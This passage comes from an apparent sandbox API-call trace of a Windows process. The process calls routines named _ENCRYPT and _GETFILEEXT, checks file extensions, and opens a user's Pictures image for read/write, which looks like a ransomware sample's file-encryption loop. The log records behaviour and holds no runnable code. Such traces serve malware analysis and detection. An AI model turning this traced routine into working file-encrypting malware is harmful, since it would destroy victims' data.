lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.457] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.457] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0039.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.458] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.458] CloseHandle (hObject=0x140) returned 1 [0039.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.458] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.459] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.459] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.459] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.459] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.459] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.459] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.460] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.460] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.460] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0039.460] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.460] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0039.460] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.460] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.460] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.460] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.460] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.460] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.460] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.461] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.461] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.461] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.461] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.461] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hfkycn4w3tol.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.461] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.461] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.461] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.461] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.461] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.461] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.461] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.462] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.462] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.462] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.462] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.462] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.462] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.462] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.462] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.462] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd2a7c0, ftCreationTime.dwHighDateTime=0x1d5c30e, ftLastAccessTime.dwLowDateTime=0xae940c60, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0xae940c60, ftLastWriteTime.dwHighDateTime=0x1d5b820, nFileSizeHigh=0x0, nFileSizeLow=0x10ae9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HFkYcn4W3ToL.png", cAlternateFileName="HFKYCN~1.PNG")) returned 0x7c20c0 [0039.462] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.462] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.462] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd2a7c0, ftCreationTime.dwHighDateTime=0x1d5c30e, ftLastAccessTime.dwLowDateTime=0xae940c60, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0xae940c60, ftLastWriteTime.dwHighDateTime=0x1d5b820, nFileSizeHigh=0x0, nFileSizeLow=0x10ae9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HFkYcn4W3ToL.png", cAlternateFileName="HFKYCN~1.PNG")) returned 0x7c20c0 [0039.463] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.463] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HFkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FkYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kYcn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ycn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cn4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.464] CompareStringW 